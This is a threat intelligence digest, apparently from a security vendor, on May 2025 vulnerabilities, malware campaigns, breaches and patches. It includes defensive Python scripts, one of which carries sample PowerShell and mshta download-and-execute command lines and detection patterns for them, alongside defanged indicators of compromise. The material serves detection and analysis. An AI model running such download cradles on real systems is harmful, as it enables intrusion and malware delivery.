Executive Summary -
Highlights of Cyber Threat Intelligence Digest
Vulnerabilities
CISA adds vulnerability CVE-2025-4632 to its Known Exploited Vulnerabilities catalogue - On the 22nd of May 2025, the US Cybersecurity and Infrastructure Security Agency (CISA) added the critical-severity vulnerability CVE-2025-4632 to its Known Exploited Vulnerabilities (KEV) catalogue.
CVE-2025-4632 is a path traversal vulnerability in Samsung MagicINFO 9 Server versions prior to 21.1052.0. Exploitation allows an attacker to write an arbitrary file with system authority, which can be turned into arbitrary code execution. The flaw is a bypass of the fix for the earlier MagicINFO vulnerability CVE-2024-7399, so servers patched only for that issue remain exposed. The Hacker News reported on May 14, 2025, that unidentified threat actors were exploiting CVE-2025-4632 to deploy the Mirai botnet.
EclecticIQ Discloses Active Exploitation of CVE-2025-4428 by Chinese State-Sponsored Group - On May 21st, EclecticIQ assessed that the active intrusion campaign exploiting the Ivanti Endpoint Manager Mobile (EPMM) vulnerability CVE-2025-4428 was very likely the work of the Chinese espionage group UNC5221. Ivanti publicly disclosed the vulnerability on May 13th, and EclecticIQ observed exploitation beginning on May 15th. Targeting spanned North America, Europe and the Asia-Pacific, and major sectors within those regions, including healthcare, government, telecommunications and defence.
CVE-2025-4428, as described by Ivanti, is a remote code execution vulnerability in Ivanti Endpoint Manager Mobile that allows an authenticated attacker to execute arbitrary code on the target system; Ivanti attributes the flaw to an open-source library used by the product. In the observed intrusions it was chained with CVE-2025-4427, an authentication bypass in the same product, so the pair yields unauthenticated remote code execution. Exposure checks should therefore treat the two CVEs together.
Atlassian Discloses Patches for High Severity Vulnerabilities in Bamboo, Confluence, Fisheye/Crucible, and Jira - On May 20, 2025, Atlassian published a security bulletin detailing five high-severity flaws in Bamboo, Confluence, Fisheye/Crucible and Jira. Four of the five originate in third-party libraries bundled with the products (Netty, Apache Tomcat, XStream and json-smart); the fifth is in Jira itself. Exploitation could let an attacker trigger a denial-of-service condition or, in the Jira case, escalate privileges on the affected system.
At the time of writing there have been no reports of these vulnerabilities being exploited in the wild. The vulnerabilities disclosed in the security bulletin are:
- CVE-2025-22157 - A privilege escalation flaw in Jira itself, affecting Jira Core Data Centre and Jira Service Management Data Centre
- CVE-2025-31650 - A DoS flaw in Apache Tomcat, affecting Bamboo and Confluence Data Centre and Server
- CVE-2025-24970 - A DoS flaw in Netty, affecting Jira Software Data Centre and Server, and Jira Service Management Data Centre and Server
- CVE-2024-47072 - A DoS flaw in XStream, affecting Confluence Data Centre and Server
- CVE-2024-57699 - A DoS flaw in json-smart, affecting Fisheye/Crucible Data Centre and Server
Potential Threats
Insikt Group Validates TTPs for Detecting CoffeeLoader - On May 27th, Recorded Future's Insikt Group published a write-up validating the TTPs of CoffeeLoader. Zscaler ThreatLabz first reported on CoffeeLoader on March 26th, 2025; samples date back to September 2024.
Zscaler ThreatLabz linked the loader to the SmokeLoader malware family and observed it deploying Rhadamanthys shellcode. CoffeeLoader uses advanced evasion techniques, including a GPU-based packer, to bypass AV, EDR and sandbox detection.
Malvertising Campaign Uses Kling AI to Deliver PureHVNC RAT - On May 20th, Check Point Research published details of a global malvertising campaign that impersonates Kling AI, a text-to-video generation service. The firm began monitoring the campaign in early 2025.
Check Point Research observed threat actors using paid ads and Facebook pages that redirected users who clicked to a convincing spoof of the Kling AI website. The spoofed site prompted the user to upload an image or enter a text prompt and then offered a download that appeared to be the AI-generated media file. The download was in fact a ZIP archive containing a malicious Windows executable (.exe).
CISA and FBI Detail TTPs Used by LummaC2 Against US Infrastructure Sectors - On May 21, 2025, CISA and the FBI released a joint advisory detailing the tactics, techniques, and procedures (TTPs) used by unidentified actors to deploy the LummaC2 information-stealer against US critical infrastructure. Its rising popularity is reflected in criminal markets, where log sales rose 71.7% from April to June 2024 compared to the same period in 2023.
Threat actors deliver LummaC2 via phishing emails with CAPTCHA-gated links that instruct the victim to paste a clipboard-loaded PowerShell command into the Windows Run dialog (the so-called ClickFix technique), or through fake installers posing as legitimate applications such as media players or system tools.
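The clipboard-to-PowerShell chain described above leaves a recognisable trace in process-creation telemetry: an interpreter launched directly by explorer.exe (the parent of the Win+R Run dialog) with a command line that hides its window, carries an encoded payload, or pulls a second stage from the internet. The script below is an added illustration rather than detection content from the CISA/FBI advisory; it runs that logic over a few constructed Sysmon-style events (the users, hosts and URLs are made up, and the indicator list is an assumption about what a pasted fake-CAPTCHA command typically contains):

```python
"""Flag ClickFix-style LummaC2 delivery in process-creation telemetry.

Added example (not from the CISA/FBI advisory): the events below are constructed
in a Sysmon Event ID 1-like JSON shape, and the indicator list is an assumption
about what a pasted 'fake CAPTCHA' command typically contains.
"""
import base64
import json
import re

# Interpreters a pasted Run-dialog command ends up in, and the parent that
# implies the user typed/pasted it (Win+R is hosted by explorer.exe).
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}
RUN_DIALOG_PARENTS = {"explorer.exe"}

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob
ENCODED_RE = re.compile(r"(?i)-e(c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")

INDICATORS = [
    (re.compile(r"(?i)-w(indowstyle)?\s+h(idden)?\b"), "hidden window"),
    (ENCODED_RE, "encoded command"),
    (re.compile(r"(?i)\b(iex|invoke-expression)\b"), "Invoke-Expression"),
    (re.compile(r"(?i)\b(irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring|downloadfile)\b"),
     "download cradle"),
    (re.compile(r"(?i)\bmshta(\.exe)?\s+https?://"), "mshta remote HTA"),
    (re.compile(r"(?i)(i am not a robot|captcha|verification id)"), "CAPTCHA lure text"),
]


def decode_encoded_command(cmdline: str) -> str:
    """Return the UTF-16LE plaintext behind -EncodedCommand, or '' if absent/invalid."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(2)).decode("utf-16-le", errors="replace")
    except ValueError:
        return ""


def indicators(text: str) -> list:
    """Ordered, de-duplicated list of indicator labels matched in `text`."""
    hits = []
    for pattern, label in INDICATORS:
        if pattern.search(text) and label not in hits:
            hits.append(label)
    return hits


def detect_clickfix(json_lines) -> list:
    """Return flagged events as dicts with the user, interpreter and reasons."""
    flagged = []
    for line in json_lines:
        ev = json.loads(line)
        image = ev.get("Image", "").rsplit("\\", 1)[-1].lower()
        parent = ev.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
        cmdline = ev.get("CommandLine", "")
        if image not in INTERPRETERS:
            continue
        from_run_dialog = parent in RUN_DIALOG_PARENTS
        # Scan the visible command line plus whatever -EncodedCommand hides.
        hits = indicators(cmdline + "\n" + decode_encoded_command(cmdline))
        # One indicator alone is weak; an interpreter launched straight from
        # explorer.exe with any indicator, or two indicators anywhere, is worth a look.
        if (from_run_dialog and hits) or len(hits) >= 2:
            reasons = (["spawned by explorer.exe (Run dialog / pasted command)"] if from_run_dialog else []) + hits
            flagged.append({"user": ev.get("User", "?"), "image": image, "reasons": reasons})
    return flagged


# Constructed sample telemetry (not real logs).
ENCODED_SAMPLE = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p')".encode("utf-16-le")
).decode("ascii")
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    json.dumps({"ParentImage": r"C:\Windows\explorer.exe", "Image": POWERSHELL, "User": "CORP\\jdoe",
                "CommandLine": 'powershell -w hidden -ep bypass -c "iex (irm http://example.invalid/x)" '
                               '# I am not a robot - reCAPTCHA Verification ID: 8321'}),
    json.dumps({"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\mshta.exe",
                "User": "CORP\\asmith", "CommandLine": "mshta https://example.invalid/verify.hta"}),
    json.dumps({"ParentImage": r"C:\Windows\explorer.exe", "Image": POWERSHELL, "User": "CORP\\bwong",
                "CommandLine": "powershell -NoProfile -EncodedCommand " + ENCODED_SAMPLE}),
    json.dumps({"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": POWERSHELL, "User": "CORP\\admin",
                "CommandLine": "powershell Get-Process | Sort-Object CPU"}),  # benign admin use
]

if __name__ == "__main__":
    for hit in detect_clickfix(SAMPLE_EVENTS):
        print(f"{hit['user']:>12} {hit['image']:<16} {'; '.join(hit['reasons'])}")
```

The benign fourth event (an administrator running Get-Process from a cmd prompt) is not flagged, which is the point of requiring either the explorer.exe parent or two independent indicators before raising an alert.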
General News
Adidas Discloses the Breach of Customer Data - On May 23rd, 2025, Adidas, the German sportswear corporation, confirmed a data breach in which an unauthorised attacker obtained certain consumers' data through a third-party customer service provider. Adidas stated, "We immediately took steps to contain the incident and launched a comprehensive investigation, collaborating with leading information security experts."
The compromised data primarily consisted of contact details of consumers who had previously contacted the company's customer service help desk. Adidas also confirmed that no passwords, credit card information or other payment-related details were compromised as a result of the breach.
Adidas added that it is "currently in the process of informing potentially affected consumers as well as appropriate data protection and law enforcement authorities consistent with applicable law".
Sensitive data stolen in West Lothian cyber attack - On May 21st, 2025, West Lothian Council confirmed that sensitive personal data was stolen during a ransomware attack on its education network.
The council was alerted to a suspected cyber attack on May 6th, two weeks earlier. The attack affected IT systems used by its 13 secondary schools, 69 primary schools and 61 nurseries. The education network was quickly isolated from the rest of the council's network, and no evidence emerged that other systems were affected.
Most of the stolen data related to operational matters such as lesson planning, but officials have now accepted that some personal information was also taken. The council became aware that sensitive data had been exfiltrated after a scanned passport was found published online; it has not been confirmed whether the passport belonged to a child or an adult. The council stated that data was taken from less than 10 percent of its servers.
Ransomware hackers charged, infrastructure dismantled in international law enforcement operation - Last week, North American and European law enforcement agencies joined forces in the latest phase of Operation Endgame, dismantling infrastructure used to stage ransomware attacks. Europol reported the takedown of 300 servers and 650 domains and the seizure of €3.5 million in cryptocurrency. Multiple arrest warrants were issued, and the U.S. charged 16 members of the DanaBot malware operation, whose malware infected more than 300,000 computers and caused at least $50 million in damages.
The operation targeted malware used to gain initial access to systems before ransomware deployment, disrupting not only DanaBot but also other loaders such as Bumblebee, Qakbot and Trickbot. These tools are commonly sold or rented to other cybercriminals. U.S. authorities are now working with the U.K.-based Shadowserver Foundation to notify additional DanaBot victims.
Threat Actor Weekly Graph
Over the past 7 days, we have been tracking the following intent and opportunity changes within our Threat Actor Landscape.
Intent represents the potential targets of a group. When a group is observed attacking a different organisation or entity, their intent will increase.
Opportunity represents the various methods and technologies these groups may use. For example, if a group started using a new attack vector, such as a new kind of ransomware, their opportunity would increase.
Both intent and opportunity are scored out of 100 and are responsible for scoring the group's severity. These updates can be seen below.
● Limited Severity | ● Basic Severity | ● Moderate Severity | ● High Severity |
Threat Actor | Severity (previous → current) | Opportunity (previous → current) | Intent (previous → current)
---|---|---|---
GRU 85 Main Special Service Centre | NEW → ● Basic | NEW → ● 49 | NEW → ● 30
UNC5221 | NEW → ● Basic | NEW → ● 45 | NEW → ● 25
Bert Ransomware Group | NEW → ● Basic | NEW → ● 25 | NEW → ● 30
World Leaks Ransomware Group | NEW → ● Basic | NEW → ● 25 | NEW → ● 30
LongNight | NEW → ● Basic | NEW → ● 25 | NEW → ● 25
Global Trends Powered by Recorded Future
Within each category, we have provided the current top five globally trending items. Each item is linked to how actively trending it is and is marked with a small symbol.
The spikes in references are calculated over 60 days and are normalised to ensure they aren't disproportionate when compared to bigger entities that will naturally have more baseline mentions.
▲- Spike – This indicates a large increase in reporting volume and a high diversity in the event descriptions.
▲- Rise – This indicates a small increase in reporting volume with little diversity in the descriptions.
Attackers | Methods | Vulnerabilities | Targets
---|---|---|---
Taiwan ▲ | Evilginx ▲ | CVE-2025-0994 ▲ | Adidas ▲
Laundry Bear ▲ | Embargo Ransomware ▲ | CVE-2025-37899 ▲ | Microsoft ▲
TAG-110 (UAC-0063) ▲ | Rhysida ▲ | CVE-2025-32756 ▲ | NATO ▲
BlueDelta ▲ | Safepay Ransomware ▲ | CVE-2025-20118 ▲ | Food and Beverage ▲
DieNet ▲ | HATVIBE ▲ | CVE-2025-4664 ▲ | Solana ▲
Prominent Information Security Events
Insikt Group Validates TTPs for Detecting CoffeeLoader
Source: Insikt Group, Zscaler ThreatLabz | Validated Intelligence Event
IOC: Domain - hxxps://freeimagecdn[.]com/
IOC: Domain - hxxps://mvnrepo[.]net/
IOC: SHA256 - c930eca887fdf45aef9553c258a403374c51b9c92c481c452ecf1a4e586d79d9
IOC: SHA256 - 8941b1f6d8b6ed0dbc5e61421abad3f1634d01db72df4b38393877bd111f3552
On May 27, 2025, Recorded Future's Insikt Group released a write-up validating CoffeeLoader's tactics, techniques, and procedures (TTPs), based on earlier research by Zscaler ThreatLabz. First identified in March 2025, CoffeeLoader has been active since at least September 2024 and is linked to the SmokeLoader malware ecosystem. It has been used to deploy Rhadamanthys shellcode and is noted for its advanced evasion capabilities, indicating its use by sophisticated threat actors seeking to evade AV, EDR, and sandbox detection.
CoffeeLoader uses a custom packer called "Armoury" that offloads decryption routines to the GPU via OpenCL, making analysis in virtual environments more difficult. The malware installs as ArmouryAIOSDK.dll and may persist using scheduled tasks. If not run with elevated privileges, it will bypass User Account Control (UAC) through CMSTPLUA COM interfaces. It injects its payload into a suspended DLLhost.exe process and employs techniques like call stack spoofing, DJB2-hashed API resolution, RC4 encryption, and optional Windows fibres for stealth.
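Hashed API resolution means the loader's import table shows none of the Windows functions it actually calls; an analyst recovers them by hashing candidate export names with the same algorithm and matching the results against DWORDs in the unpacked sample. The helper below is an added example rather than code from the Insikt or Zscaler write-ups. It assumes classic 32-bit DJB2 (seed 5381, h = h*33 + c over the ASCII name) and scans a constructed hash blob, since the page does not give the exact variant the loader uses; seed and case handling are parameters for that reason.

```python
"""Resolve DJB2-hashed API names of the kind CoffeeLoader uses to hide its imports.

Added analyst helper, not code from CoffeeLoader or the Insikt/Zscaler write-ups.
Assumption: the loader's hash is classic 32-bit DJB2 (seed 5381, h = h*33 + c over
the ASCII export name). A real sample may add a salt or lowercase the name first,
which is why `seed` and `lowercase` are parameters below.
"""
import struct


def djb2(name: str, seed: int = 5381) -> int:
    """Classic DJB2 over the ASCII bytes of `name`, truncated to 32 bits."""
    h = seed
    for b in name.encode("ascii"):
        h = ((h << 5) + h + b) & 0xFFFFFFFF  # h * 33 + c, mod 2^32
    return h


# Exports a loader typically resolves at runtime (constructed list for the example).
COMMON_APIS = [
    "LoadLibraryA", "LoadLibraryW", "GetProcAddress", "VirtualAlloc", "VirtualProtect",
    "VirtualFree", "CreateThread", "CreateFiber", "SwitchToFiber", "ConvertThreadToFiber",
    "OpenProcess", "WriteProcessMemory", "CreateProcessW", "ResumeThread",
    "NtQueueApcThread", "RtlCreateUserThread", "CoCreateInstance", "CoInitializeEx",
    "CreateMutexA", "RegOpenKeyExA", "InternetOpenA", "WinHttpOpen", "WinHttpConnect",
]


def build_hash_table(names, seed: int = 5381, lowercase: bool = False) -> dict:
    """Map hash -> export name so hashes found in a sample can be looked up."""
    table = {}
    for n in names:
        table[djb2(n.lower() if lowercase else n, seed)] = n
    return table


def resolve_hashes(hashes, table: dict) -> dict:
    """Look up each hash; unknown values are reported rather than dropped."""
    return {h: table.get(h, "<unknown>") for h in hashes}


def find_hashed_apis(blob: bytes, table: dict) -> list:
    """Scan a dumped config/shellcode blob for little-endian DWORDs that are known hashes.

    The scan is byte-aligned (step 1) because hash lists are not always 4-byte
    aligned in unpacked code.
    """
    found = []
    for off in range(0, len(blob) - 3):
        val = struct.unpack_from("<I", blob, off)[0]
        if val in table:
            found.append((off, table[val]))
    return found


def sample_blob() -> bytes:
    """Constructed stand-in for a dumped hash list: padding, a hash, filler, two more hashes."""
    return (b"\x00" * 4
            + struct.pack("<I", djb2("VirtualAlloc"))
            + b"\x90" * 4
            + struct.pack("<I", djb2("CreateThread"))
            + struct.pack("<I", djb2("SwitchToFiber")))


if __name__ == "__main__":
    table = build_hash_table(COMMON_APIS)
    for off, name in find_hashed_apis(sample_blob(), table):
        print(f"offset 0x{off:02x}: {name} (0x{djb2(name):08x})")
```

If no hits come back from a real sample, the variant differs: try `lowercase=True`, a different seed, or XOR/ADD the recovered constant from the hashing routine into `djb2` before rebuilding the table.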
Communication with command-and-control (C2) servers occurs over HTTPS with hard-coded iPhone-like user-agent strings and TLS certificate pinning. CoffeeLoader can execute shellcode, EXEs, and DLLs from its C2, and includes a fallback domain generation algorithm (DGA) for redundancy. Its similarities to SmokeLoader include bot ID and mutex generation, hashed imports, and scheduled task persistence, marking it as a highly evasive and resilient threat.
Malvertising Campaign Uses Kling AI to Deliver PureHVNC RAT
Source: Insikt Group, Check Point Research | Validated Intelligence Event
IOC: SHA256 - F5B31BD394E0A3ADB6BD175207B8C3CCC51850C8F2CEE1149A8421736168E13E
IOC: SHA256 - F89298933FED52511BB78F8F377979190E37367D72CCF4F3B81374A70362CC42
IOC: Domain - klingaimedia[.]com
IOC: IP - 185.149.232[.]197
On May 20, 2025, Check Point Research reported a global malvertising campaign impersonating Kling AI, a text-to-video generation service. Threat actors used fake Facebook pages and paid ads to redirect users to spoofed websites such as klingaimedia[.]com, which was still online when the report was published. Victims were prompted to upload an image or enter a text prompt and were then offered what appeared to be the AI-generated media as a download. The file was a ZIP archive containing a malicious Windows executable (.exe) whose filename used a double extension and special Unicode characters to hide its true type.
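The double-extension and Unicode tricks described above are cheap to check for at the mail gateway or on a downloaded archive before anyone opens it. The script below is an added example (not Check Point's tooling) that builds a small constructed ZIP with names of the kind described, then flags right-to-left overrides and other invisible format/control characters, whitespace padding, and a decoy media extension sitting in front of an executable one; the entry names are invented and do not reproduce the campaign's actual filenames.

```python
"""Spot filenames built to disguise an executable as media, as in the fake Kling AI download.

Added example, not Check Point's code. The ZIP and its entry names are constructed here to
mirror the page's description (double extension, padding, Unicode tricks); the exact names
used in the campaign are not reproduced.
"""
import io
import re
import unicodedata
import zipfile

EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".vbs", ".hta", ".msi", ".lnk", ".ps1"}
DECOY_EXTS = {".mp4", ".mov", ".webm", ".jpg", ".jpeg", ".png", ".gif", ".pdf", ".txt"}


def displayed_name(name: str) -> str:
    """Approximate how a file manager renders a name containing U+202E (RIGHT-TO-LEFT
    OVERRIDE): everything after the override is drawn reversed. Full bidi layout is more
    involved; this is enough to see the decoy the attacker intended."""
    if "\u202e" not in name:
        return name
    head, _, tail = name.partition("\u202e")
    return head + tail[::-1]


def inspect_filename(name: str) -> list:
    """Return a list of human-readable findings; empty means nothing suspicious."""
    findings = []
    # Cf = format (RLO, zero-width space, ...), Cc = control characters.
    hidden = [c for c in name if unicodedata.category(c) in ("Cf", "Cc")]
    if hidden:
        findings.append("invisible format/control characters: " + " ".join(f"U+{ord(c):04X}" for c in hidden))
        if "\u202e" in name:
            findings.append(f"right-to-left override; displays as '{displayed_name(name)}'")
    visible = "".join(c for c in name if c not in hidden).lower()
    if re.search(r" {3,}", visible):
        findings.append("long whitespace run pushes the real extension out of view")
    parts = visible.split(".")
    real_ext = "." + parts[-1].strip() if len(parts) > 1 else ""
    if real_ext in EXECUTABLE_EXTS:
        findings.append(f"executable extension {real_ext}")
        if len(parts) > 2 and "." + parts[-2].strip() in DECOY_EXTS:
            findings.append(f"double extension: decoy .{parts[-2].strip()} before {real_ext}")
    return findings


def scan_zip_bytes(data: bytes) -> dict:
    """Return {entry name: findings} for every file entry in an in-memory ZIP."""
    report = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if not info.is_dir():
                report[info.filename] = inspect_filename(info.filename)
    return report


# Constructed entry names (not the campaign's real filenames).
PADDED_NAME = "Kling_AI_Generated_Video.mp4" + " " * 40 + ".exe"
RLO_NAME = "Generated_Image\u202egpj.exe"   # renders roughly as Generated_Imageexe.jpg


def build_sample_zip() -> bytes:
    """Constructed archive: two disguised executables and one genuine-looking media file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(PADDED_NAME, b"MZ" + b"\x00" * 62)
        zf.writestr(RLO_NAME, b"MZ" + b"\x00" * 62)
        zf.writestr("render_output.mp4", b"\x00\x00\x00\x18ftypmp42")
    return buf.getvalue()


if __name__ == "__main__":
    for entry, findings in scan_zip_bytes(build_sample_zip()).items():
        print(repr(entry), "->", findings or ["looks ordinary"])
```

Printing the entry name with `repr` matters: a plain print would render the RLO trick exactly as the victim saw it and hide the problem from the analyst too.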
Once launched, the loader performed anti-analysis checks to evade detection tools and virtual machine environments. It established persistence by copying itself to the %APPDATA%\Local directory and modifying Windows registry Run keys. To avoid detection, it injected itself into trusted system processes such as InstallUtil.exe and AddInProcess32.exe. The malware followed embedded commands to decide whether to disable antivirus software, self-delete, or restart after termination, enhancing its stealth and longevity.
The final stage of the attack involved deploying an obfuscated PureHVNC remote access trojan (RAT). This tool enabled hidden remote control of the infected system, allowing threat actors to steal credentials, monitor browser extensions, and track cryptocurrency-related activity. PureHVNC included a plugin that captured screenshots of financial or crypto-related windows and transmitted them to the attacker's command and control server, making the campaign particularly dangerous for users involved in online banking or digital asset management.
Remediation Actions
Following the information provided above, we recommend that the technologies mentioned be fully patched and updated. We also want to highlight and recommend applying the following patches where applicable:
- CVE-2025-4632: Apply the SVP-MAY-2025 Samsung security update to all affected devices.
- CVE-2025-4428: Install one of the fixed versions: 11.12.0.5, 12.3.0.2, 12.4.0.2 or 12.5.0.1. These releases also fix the chained authentication bypass CVE-2025-4427.
- CVE-2025-22157, CVE-2025-31650, CVE-2025-24970, CVE-2024-47072 and CVE-2024-57699: Patch Atlassian instances to the fixed versions listed in the security bulletin, or to the latest release, to remediate these vulnerabilities.
If you are currently an Acumen Cyber Vulnerability Management customer, we will be proactively performing related searching and hunting activities within your environment.